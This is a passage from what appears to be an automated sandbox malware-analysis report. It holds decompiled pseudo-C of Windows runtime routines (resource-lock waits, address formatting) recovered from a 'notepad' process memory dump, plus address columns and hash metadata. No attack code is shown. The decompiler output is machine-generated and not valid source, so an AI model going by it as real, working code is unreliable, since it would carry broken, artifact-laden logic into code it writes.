					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L59:
			}




































                                                  0x00ae055a
                                                  0x00ae055d
                                                  0x00ae0563
                                                  0x00ae0566
                                                  0x00ae05d8
                                                  0x00ae05e2
                                                  0x00ae05e5
                                                  0x00000000
                                                  0x00ae05e7
                                                  0x00ae05e7
                                                  0x00ae05ea
                                                  0x00ae05f3
                                                  0x00ae05f3
                                                  0x00ae0568
                                                  0x00ae0568
                                                  0x00ae0568
                                                  0x00ae0569
                                                  0x00ae0569
                                                  0x00ae0569
                                                  0x00ae056b
                                                  0x00000000
                                                  0x00000000
                                                  0x00b0217f
                                                  0x00b02183
                                                  0x00b0225b
                                                  0x00b0225f
                                                  0x00b02189
                                                  0x00b0218c
                                                  0x00b0218f
                                                  0x00b02194
                                                  0x00b02199
                                                  0x00b0219d
                                                  0x00b021a0
                                                  0x00b021a2
                                                  0x00b021ce
                                                  0x00b021ce
                                                  0x00b021ce
                                                  0x00b021d0
                                                  0x00b021d6
                                                  0x00b021de
                                                  0x00b021e2
                                                  0x00b021e8
                                                  0x00b021e9
                                                  0x00b021ec
                                                  0x00b021f1
                                                  0x00b021f6
                                                  0x00000000
                                                  0x00000000
                                                  0x00b021f8
                                                  0x00b021fb
                                                  0x00b02206
                                                  0x00b0220b
                                                  0x00b0220c
                                                  0x00b02217
                                                  0x00b02226
                                                  0x00b0222b
                                                  0x00b0222c
                                                  0x00b0222f
                                                  0x00b02232
                                                  0x00b02235
                                                  0x00b02235
                                                  0x00b0223a
                                                  0x00b0223f
                                                  0x00b02241
                                                  0x00b02243
                                                  0x00b02248
                                                  0x00b02248
                                                  0x00b0224d
                                                  0x00b0224f
                                                  0x00b02262
                                                  0x00b02263
                                                  0x00b02268
                                                  0x00b02269
                                                  0x00b02269
                                                  0x00b02269
                                                  0x00b0226d
                                                  0x00000000
                                                  0x00000000
                                                  0x00b02276
                                                  0x00b02279
                                                  0x00b0227e
                                                  0x00b02283
                                                  0x00b02287
                                                  0x00b0228a
                                                  0x00b0228d
                                                  0x00b0228f
                                                  0x00b022bc
                                                  0x00b022bc
                                                  0x00b022bc
                                                  0x00b022be
                                                  0x00b022c4
                                                  0x00b022cc
                                                  0x00b022d0
                                                  0x00b022d6
                                                  0x00b022d7
                                                  0x00b022da
                                                  0x00b022df
                                                  0x00b022e4
                                                  0x00000000
                                                  0x00000000
                                                  0x00b022e6
                                                  0x00b022e9
                                                  0x00b022f4
                                                  0x00b022f9
                                                  0x00b022fa
                                                  0x00b02305
                                                  0x00b02314
                                                  0x00b02319
                                                  0x00b0231a
                                                  0x00b0231d
                                                  0x00b02320
                                                  0x00b02323
                                                  0x00b02323
                                                  0x00b02328
                                                  0x00b0232d
                                                  0x00b0232f
                                                  0x00b02331
                                                  0x00b02336
                                                  0x00b02336
                                                  0x00b0233b
                                                  0x00b0233d
                                                  0x00b02350
                                                  0x00b02351
                                                  0x00b02356
                                                  0x00b02359
                                                  0x00b02359
                                                  0x00b0235b
                                                  0x00b0235d
                                                  0x00ac5367
                                                  0x00ac536b
                                                  0x00ac5372
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00b02363
                                                  0x00b02363
                                                  0x00b02369
                                                  0x00b0236a
                                                  0x00b0236c
                                                  0x00b02371
                                                  0x00b02373
                                                  0x00000000
                                                  0x00b02379
                                                  0x00b02379
                                                  0x00b0237a
                                                  0x00b0237f
                                                  0x00b0237f
                                                  0x00b02385
                                                  0x00b02386
                                                  0x00b02389
                                                  0x00b0238e
                                                  0x00b02390
                                                  0x00ac5378
                                                  0x00ac537c
                                                  0x00b02396
                                                  0x00b02396
                                                  0x00b02397
                                                  0x00b0239c
                                                  0x00b023a2
                                                  0x00b023a3
                                                  0x00b023a6
                                                  0x00b023ab
                                                  0x00b023ad
                                                  0x00000000
                                                  0x00b023b3
                                                  0x00b023b3
                                                  0x00b023b4
                                                  0x00b023b9
                                                  0x00b023ba
                                                  0x00b023ba
                                                  0x00b023bc
                                                  0x00b023bf
                                                  0x00000000
                                                  0x00000000
                                                  0x00af9153
                                                  0x00af9158
                                                  0x00af915a
                                                  0x00af915e
                                                  0x00af9160
                                                  0x00000000
                                                  0x00af9166
                                                  0x00af9166
                                                  0x00af9171
                                                  0x00af9176
                                                  0x00af9176
                                                  0x00000000
                                                  0x00af9160
                                                  0x00b023c6
                                                  0x00b023ce
                                                  0x00b023d7
                                                  0x00b023d7
                                                  0x00b023ad
                                                  0x00b02390
                                                  0x00b02373
                                                  0x00b0233f
                                                  0x00b0233f
                                                  0x00000000
                                                  0x00b0233f
                                                  0x00b02291
                                                  0x00b02291
                                                  0x00b02293
                                                  0x00b02295
                                                  0x00b0229a
                                                  0x00b022a1
                                                  0x00b022a3
                                                  0x00b022a7
                                                  0x00b022a9
                                                  0x00000000
                                                  0x00000000
                                                  0x00b022ab
                                                  0x00b022ad
                                                  0x00b022af
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00b022af
                                                  0x00b022b1
                                                  0x00b022b4
                                                  0x00b022b4
                                                  0x00b022b6
                                                  0x00ac53be
                                                  0x00ac53be
                                                  0x00ac53be
                                                  0x00ac53c0
                                                  0x00000000
                                                  0x00000000
                                                  0x00ac53cb
                                                  0x00ac53ce
                                                  0x00ac53d0
                                                  0x00ac53d4
                                                  0x00ac53d6
                                                  0x00000000
                                                  0x00ac53d8
                                                  0x00ac53e3
                                                  0x00ac53ea
                                                  0x00ac53ea
                                                  0x00000000
                                                  0x00ac53d6
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00b022b6
                                                  0x00000000
                                                  0x00b0228f
                                                  0x00b02349
                                                  0x00b0234d
                                                  0x00b02251
                                                  0x00b02251
                                                  0x00000000
                                                  0x00b02251
                                                  0x00b021a4
                                                  0x00b021a4
                                                  0x00b021a6
                                                  0x00b021a8
                                                  0x00b021ac
                                                  0x00b021b6
                                                  0x00b021b8
                                                  0x00b021bc
                                                  0x00b021be
                                                  0x00000000
                                                  0x00000000
                                                  0x00b021c0
                                                  0x00b021c2
                                                  0x00b021c4
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00b021c4
                                                  0x00b021c6
                                                  0x00b021c6
                                                  0x00b021c8
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00b021c8
                                                  0x00b021a2
                                                  0x00000000
                                                  0x00b02183
                                                  0x00ae057b
                                                  0x00ae057d
                                                  0x00ae0581
                                                  0x00ae0583
                                                  0x00b02178
                                                  0x00000000
                                                  0x00ae0589
                                                  0x00ae058f
                                                  0x00ae058f
                                                  0x00ae0583
                                                  0x00000000

                                                  APIs
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B02206
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1044571883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A80000, based on PE: true
                                                  • Associated: 00000009.00000002.1044557902.0000000000A80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045598601.0000000000B70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045620887.0000000000B80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045707273.0000000000B84000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045725616.0000000000B87000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045738115.0000000000B90000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1046306994.0000000000BF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_a80000_notepad.jbxd
                                                  Similarity
                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                  • API String ID: 885266447-4236105082
                                                  • Opcode ID: 423e6f431d687c7c9d616be22b2a4422cc303c9c2aac6e05133ac0568b5de145
                                                  • Instruction ID: 544a4fdd3120c5e4ae2434e45f8bb8a2bbf85b607386c36bea170aa5a6d7ba88
                                                  • Opcode Fuzzy Hash: 423e6f431d687c7c9d616be22b2a4422cc303c9c2aac6e05133ac0568b5de145
                                                  • Instruction Fuzzy Hash: 63514931B002416FEB158B59CC86F6637E9EF98720F2182A9FD45EF2C5DA71EC458790
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AE14C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 64%
                                                  			E00AE14C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0xb82088; // 0x7587b8fb
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E00AD7707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E00AE13CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E00AD7707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E00AD7707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E00AA2340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E00AAE1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}




















                                                  0x00ae14c0
                                                  0x00ae14cb
                                                  0x00ae14d2
                                                  0x00ae14d6
                                                  0x00ae14da
                                                  0x00ae14de
                                                  0x00ae14e3
                                                  0x00ae157a
                                                  0x00ae157a
                                                  0x00ae14f1
                                                  0x00ae14f3
                                                  0x00b0ea0f
                                                  0x00000000
                                                  0x00b0ea15
                                                  0x00000000
                                                  0x00b0ea15
                                                  0x00ae14f9
                                                  0x00ae14f9
                                                  0x00ae14fe
                                                  0x00ae1504
                                                  0x00b0ea1a
                                                  0x00b0ea1f
                                                  0x00b0ea21
                                                  0x00b0ea22
                                                  0x00b0ea27
                                                  0x00b0ea2a
                                                  0x00b0ea2a
                                                  0x00ae1515
                                                  0x00ae1517
                                                  0x00ae156d
                                                  0x00ae1572
                                                  0x00ae1575
                                                  0x00ae1575
                                                  0x00ae151e
                                                  0x00b0ea50
                                                  0x00b0ea55
                                                  0x00b0ea58
                                                  0x00b0ea58
                                                  0x00ae152e
                                                  0x00ae1531
                                                  0x00ae1533
                                                  0x00000000
                                                  0x00ae1535
                                                  0x00ae1541
                                                  0x00ae1549
                                                  0x00ae1549
                                                  0x00ae1533
                                                  0x00ae14f3
                                                  0x00ae1559

                                                  APIs
                                                  • ___swprintf_l.LIBCMT ref: 00B0EA22
                                                    • Part of subcall function 00AE13CB: ___swprintf_l.LIBCMT ref: 00AE146B
                                                    • Part of subcall function 00AE13CB: ___swprintf_l.LIBCMT ref: 00AE1490
                                                  • ___swprintf_l.LIBCMT ref: 00AE156D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1044571883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A80000, based on PE: true
                                                  • Associated: 00000009.00000002.1044557902.0000000000A80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045598601.0000000000B70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045620887.0000000000B80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045707273.0000000000B84000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045725616.0000000000B87000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045738115.0000000000B90000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1046306994.0000000000BF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_a80000_notepad.jbxd
                                                  Similarity
                                                  • API ID: ___swprintf_l
                                                  • String ID: %%%u$]:%u
                                                  • API String ID: 48624451-3050659472
                                                  • Opcode ID: 446590d734c4446de97a95334fcb83ccce65081b3557761c97753ff74727479e
                                                  • Instruction ID: 88569a7fb7bf9717da4339fd2b833c891afc8aeb4115f4bff532e9d4b77f3c87
                                                  • Opcode Fuzzy Hash: 446590d734c4446de97a95334fcb83ccce65081b3557761c97753ff74727479e
                                                  • Instruction Fuzzy Hash: 4E218172A00269ABCB20DF59CD41AEF77BCBB54700F544556F946D3280EB70EA588BE1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AC53A5 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 45%
                                                  			E00AC53A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				void* _t48;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x00b801c0;
									_push(_t92);
									_push(0);
									_t37 = E00A9F8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = E00AE4FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									E00AF3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									E00AF3F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E00B2217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E00AF3F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E00AE3915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E00AC5384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = E00A9F970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E00AE3915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = E00A9F970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												E00AE3915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = E00A9F970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E00AE3915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L38;
													}
													E00AC5329(_t74, _t92);
													_push(1);
													_t48 = E00AC53A5(_t92);
													return _t48;
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L38;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L38:
			}


























                                                  0x00ac53ab
                                                  0x00ac53ae
                                                  0x00ac53b1
                                                  0x00ac53b4
                                                  0x00ac53b7
                                                  0x00ae05b6
                                                  0x00ae05c0
                                                  0x00ae05c3
                                                  0x00000000
                                                  0x00ae05c9
                                                  0x00ae05c9
                                                  0x00ae05cc
                                                  0x00ae05d5
                                                  0x00ae05d5
                                                  0x00ac53bd
                                                  0x00ac53bd
                                                  0x00ac53bd
                                                  0x00ac53be
                                                  0x00ac53be
                                                  0x00ac53be
                                                  0x00ac53c0
                                                  0x00000000
                                                  0x00000000
                                                  0x00b02269
                                                  0x00b0226d
                                                  0x00b02349
                                                  0x00b0234d
                                                  0x00b02273
                                                  0x00b02276
                                                  0x00b02279
                                                  0x00b0227e
                                                  0x00b02283
                                                  0x00b02287
                                                  0x00b0228a
                                                  0x00b0228d
                                                  0x00b0228f
                                                  0x00b022bc
                                                  0x00b022bc
                                                  0x00b022bc
                                                  0x00b022be
                                                  0x00b022c4
                                                  0x00b022cc
                                                  0x00b022d0
                                                  0x00b022d6
                                                  0x00b022d7
                                                  0x00b022da
                                                  0x00b022df
                                                  0x00b022e4
                                                  0x00000000
                                                  0x00000000
                                                  0x00b022e6
                                                  0x00b022e9
                                                  0x00b022f4
                                                  0x00b022f9
                                                  0x00b022fa
                                                  0x00b02305
                                                  0x00b02314
                                                  0x00b02319
                                                  0x00b0231a
                                                  0x00b0231d
                                                  0x00b02320
                                                  0x00b02323
                                                  0x00b02323
                                                  0x00b02328
                                                  0x00b0232d
                                                  0x00b0232f
                                                  0x00b02331
                                                  0x00b02336
                                                  0x00b02336
                                                  0x00b0233b
                                                  0x00b0233d
                                                  0x00b02350
                                                  0x00b02351
                                                  0x00b02356
                                                  0x00b02359
                                                  0x00b02359
                                                  0x00b0235b
                                                  0x00b0235d
                                                  0x00ac5367
                                                  0x00ac536b
                                                  0x00ac5372
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00b02363
                                                  0x00b02363
                                                  0x00b02369
                                                  0x00b0236a
                                                  0x00b0236c
                                                  0x00b02371
                                                  0x00b02373
                                                  0x00000000
                                                  0x00b02379
                                                  0x00b02379
                                                  0x00b0237a
                                                  0x00b0237f
                                                  0x00b0237f
                                                  0x00b02385
                                                  0x00b02386
                                                  0x00b02389
                                                  0x00b0238e
                                                  0x00b02390
                                                  0x00ac5378
                                                  0x00ac537c
                                                  0x00b02396
                                                  0x00b02396
                                                  0x00b02397
                                                  0x00b0239c
                                                  0x00b023a2
                                                  0x00b023a3
                                                  0x00b023a6
                                                  0x00b023ab
                                                  0x00b023ad
                                                  0x00000000
                                                  0x00b023b3
                                                  0x00b023b3
                                                  0x00b023b4
                                                  0x00b023b9
                                                  0x00b023ba
                                                  0x00b023ba
                                                  0x00b023bc
                                                  0x00b023bf
                                                  0x00000000
                                                  0x00000000
                                                  0x00af9153
                                                  0x00af9158
                                                  0x00af915a
                                                  0x00af915e
                                                  0x00af9160
                                                  0x00000000
                                                  0x00af9166
                                                  0x00af9166
                                                  0x00af9171
                                                  0x00af9176
                                                  0x00af9176
                                                  0x00000000
                                                  0x00af9160
                                                  0x00b023c6
                                                  0x00b023cb
                                                  0x00b023ce
                                                  0x00b023d7
                                                  0x00b023d7
                                                  0x00b023ad
                                                  0x00b02390
                                                  0x00b02373
                                                  0x00b0233f
                                                  0x00b0233f
                                                  0x00000000
                                                  0x00b0233f
                                                  0x00b02291
                                                  0x00b02291
                                                  0x00b02293
                                                  0x00b02295
                                                  0x00b0229a
                                                  0x00b022a1
                                                  0x00b022a3
                                                  0x00b022a7
                                                  0x00b022a9
                                                  0x00000000
                                                  0x00000000
                                                  0x00b022ab
                                                  0x00b022ad
                                                  0x00b022af
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00b022af
                                                  0x00b022b1
                                                  0x00b022b4
                                                  0x00b022b4
                                                  0x00b022b6
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00b022b6
                                                  0x00b0228f
                                                  0x00000000
                                                  0x00b0226d
                                                  0x00ac53cb
                                                  0x00ac53ce
                                                  0x00ac53d0
                                                  0x00ac53d4
                                                  0x00ac53d6
                                                  0x00000000
                                                  0x00ac53d8
                                                  0x00ac53e3
                                                  0x00ac53ea
                                                  0x00ac53ea
                                                  0x00ac53d6
                                                  0x00000000

                                                  APIs
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B022F4
                                                  Strings
                                                  • RTL: Re-Waiting, xrefs: 00B02328
                                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00B022FC
                                                  • RTL: Resource at %p, xrefs: 00B0230B
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1044571883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A80000, based on PE: true
                                                  • Associated: 00000009.00000002.1044557902.0000000000A80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045598601.0000000000B70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045620887.0000000000B80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045707273.0000000000B84000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045725616.0000000000B87000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1045738115.0000000000B90000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000009.00000002.1046306994.0000000000BF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_a80000_notepad.jbxd
                                                  Similarity
                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                  • API String ID: 885266447-871070163
                                                  • Opcode ID: 8f31ea356988c471f0e30497c02221c6da877ad59a22599b8e8c0b26992df5ad
                                                  • Instruction ID: 895ee2aeaf954110d06a97bf48d679973ad77d44d19683b85b5d85a01c7261ec
                                                  • Opcode Fuzzy Hash: 8f31ea356988c471f0e30497c02221c6da877ad59a22599b8e8c0b26992df5ad
                                                  • Instruction Fuzzy Hash: 01515472A006016BEF119B78CD85FA673E8EF48360F114269FD08DF281EB60EC8587A0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00ACEC56 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 51%
                                                  			E00ACEC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __esi;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t44;
				void* _t46;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed char _t67;
				void* _t72;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t91;
				void* _t92;
				void* _t93;

				_t80 = __edi;
				_t75 = __edx;
				_t70 = __ecx;
				_t84 = _a4;
				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
					E00ABDA92(__ecx, __edx, __eflags, _t84);
					_t38 =  *((intOrPtr*)(_t84 + 0x10));
				}
				_push(0);
				__eflags = _t38 - 0xffffffff;
				if(_t38 == 0xffffffff) {
					_t39 =  *0xb8793c; // 0x0
					_push(0);
					_push(_t84);
					_t40 = E00AA16C0(_t39);
				} else {
					_t40 = E00A9F9D4(_t38);
				}
				_pop(_t85);
				__eflags = _t40;
				if(__eflags < 0) {
					_push(_t40);
					E00AE3915(_t67, _t70, _t75, _t80, _t85, __eflags);
					asm("int3");
					while(1) {
						L21:
						_t76 =  *[fs:0x18];
						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t42 + 0x240) & 0x00000002;
						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
							_v66 = 0x1722;
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_t76 =  &_v72;
							_push( &_v72);
							_v28 = _t85;
							_v40 =  *((intOrPtr*)(_t85 + 4));
							_v32 =  *((intOrPtr*)(_t85 + 0xc));
							_push(0x10);
							_push(0x20402);
							E00AA01A4( *0x7ffe0382 & 0x000000ff);
						}
						while(1) {
							_t43 = _v8;
							_push(_t80);
							_push(0);
							__eflags = _t43 - 0xffffffff;
							if(_t43 == 0xffffffff) {
								_t71 =  *0xb8793c; // 0x0
								_push(_t85);
								_t44 = E00AA1F28(_t71);
							} else {
								_t44 = E00A9F8CC(_t43);
							}
							__eflags = _t44 - 0x102;
							if(_t44 != 0x102) {
								__eflags = _t44;
								if(__eflags < 0) {
									_push(_t44);
									E00AE3915(_t67, _t71, _t76, _t80, _t85, __eflags);
									asm("int3");
									E00B22306(_t85);
									__eflags = _t67 & 0x00000002;
									if((_t67 & 0x00000002) != 0) {
										_t7 = _t67 + 2; // 0x4
										_t72 = _t7;
										asm("lock cmpxchg [edi], ecx");
										__eflags = _t67 - _t67;
										if(_t67 == _t67) {
											E00ACEC56(_t72, _t76, _t80, _t85);
										}
									}
									return 0;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
									}
									return 2;
								}
								goto L36;
							}
							_t77 =  *((intOrPtr*)(_t80 + 4));
							_push(_t67);
							_t46 = E00AE4FC0( *_t80, _t77, 0xff676980, 0xffffffff);
							_push(_t77);
